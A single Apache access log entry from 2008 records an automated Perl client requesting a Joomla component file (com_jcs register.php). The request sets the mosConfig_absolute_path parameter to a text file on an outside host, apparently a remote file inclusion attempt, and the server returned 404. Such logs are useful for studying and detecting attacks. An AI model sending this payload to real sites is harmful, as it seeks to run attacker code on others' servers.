69.89.25.154 - - [11/Jun/2008:13:12:12 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
